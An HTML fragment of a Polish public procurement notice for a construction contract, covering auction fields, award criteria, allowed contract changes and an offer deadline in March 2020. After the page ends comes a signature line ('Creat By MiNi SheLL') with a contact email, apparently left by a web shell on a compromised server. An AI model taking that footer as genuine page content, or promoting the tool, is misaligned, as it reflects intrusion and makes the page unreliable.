id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres gwarancji jakości</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający, poza możliwością zmiany zawartej umowy na podstawie art. 144 ust. 1 pkt 2, 3, 4, 5, 6 upzp, przewiduje również możliwość dokonywania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonał wyboru Wykonawcy. Zakres przewidzianych zmian obejmuje: 1) zmianę kierownika budowy – Wykonawca może dokonać zmiany kierownika budowy przedstawionych w ofercie jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kierownika budowy na następujących warunkach:a) Wykonawca proponuje zmianę kierownika budowy w szczególności w razie: śmierci, choroby lub zdarzeń losowych, nie wywiązywania się z obowiązków wynikających z umowy, rezygnacji tej osoby itp.b) Zamawiający może żądać od Wykonawcy zmiany kierownika budowy, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić kierownika budowy zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego.c) Wykonawca musi wykazać, iż proponowany nowy kierownik budowy spełnia warunki udziału w postępowaniu określone w SIWZ w stopniu nie mniejszym niż warunki wymagane w trakcie prowadzonego postępowania.2) zmianę terminu realizacji umowy z przyczyn niezależnych od Wykonawcy ani od Zamawiającego, przy czym każda ze stron musi tą zmianę zaakceptować. Przesłanki zmiany terminu:a) Jeżeli wykonanie robót zamiennych ze względu na zasady wiedzy technicznej i sztuki budowlanej lub konieczność sporządzenia i uzgodnienia dodatkowej dokumentacji wymaga dodatkowego czasu ponad termin wynikający z umowy;b) W przypadku błędów lub braków projektowych (z winy projektanta lub nie) jest konieczne wykonanie zamówień dodatkowych warunkujących wykonanie zamówienia podstawowego, by obiekt mógł spełniać swoje przeznaczenie;c) Na skutek okoliczności wynikających z tzw. siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewiedzieć w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;d) W przypadku wystąpienie zmian w przepisach prawa uzasadniających zmianę terminu;e) W przypadku przerwy w wykonywaniu robót budowlanych wskutek zdarzeń niemożliwych do przewidzenia w chwili zawarcia umowy;f) W przypadku wydania postanowienia lub decyzji o wstrzymaniu robót budowlanych w przypadkach określonych w przepisach ustawy - Prawo budowlane albo wydania orzeczenia przez sąd bądź inny podmiot, którego nie można było przewidzieć w chwili zawarcia umowy;g) Z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.3) Zmianę wynagrodzenia w przypadku zmiany ustawowej stawki VAT. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwe umotywowanie potwierdzone przez każdą ze stron umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-03-03</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Oferta musi być przygotowana w języku polskim, w formie pisemnej, na papierze przy użyciu nośnika pisma nieulegającego usunięciu bez pozostawania śladów - podpisana przez osobę/y upoważnioną do reprezentowania Wykonawcy na zewnątrz i zaciągania zobowiązań w wysokości odpowiadającej cenie oferty.</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com